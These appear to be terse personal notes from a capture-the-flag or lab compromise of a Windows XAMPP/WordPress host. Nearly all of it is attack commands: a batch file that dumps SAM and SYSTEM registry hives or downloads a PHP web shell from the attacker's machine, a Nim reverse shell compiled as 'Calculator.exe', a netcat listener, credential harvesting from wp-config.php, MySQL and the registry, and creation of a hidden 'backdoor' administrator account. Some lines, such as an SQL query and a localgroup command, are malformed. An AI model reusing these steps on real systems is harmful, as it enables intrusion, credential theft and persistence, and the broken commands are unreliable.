git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/
subl exploit.bat
exploit.bat
@echo off
:: Check if the current user is NT AUTHORITY\SYSTEM
whoami /groups | find "S-1-5-18" > nul
if %errorlevel% equ 0 (
:: Run commands for NT AUTHORITY\SYSTEM
reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
) else (
:: Run commands for other users
curl http://$KALI:82/shell.php -o C:\xampp\htdocs\shell.php
)
I tried bypassing the file type restriction with the shell above, I could see the bat file running by seeing that it try to grab the shell.php file but I couldn't find a place to save the file where I could also see it on the website.
Kali
python2 -m SimpleHTTPServer 82
Nim reverse shell worked because they accept exe files
Kali
git clone https://github.com/Sn1r/Nim-Reverse-Shell.git
cd Nim-Reverse-Shell/
apt install mingw-w64 -y
Kali
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
Kali
subl rev_shell.nim
Kali #1
/root/.nimble/bin/nim c -d:mingw --app:gui --opt:speed -o:Calculator.exe rev_shell.nim
Kali #2
rlwrap nc -lvnp 443
Privilege Esclation
Found some credentials.
Victim
type C:\xampp\htdocs\gift\wp-config.php
From my computer I could access the mysql.
Kali
apt install mysql-client-core-5.7
mysql -h$VICTIM -ugift -pSurpriseMF
I was able to find a password but couldn't crack it
Kali(mysql)
select * from mysql -h$VICTIM -ugift -pSurpriseMF
use gift;
show tables;
select * from wp_users;
I found a password
Victim
reg query HKLM /f password /t REG_SZ /s
Kali
remmina
Username: hugo
Password: SurpriseMF123!
I can run a administrator shell from the GUI
Victim
net user backdoor pass!123 /add
net localgroup Administrators "Remote Desktop Users" backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
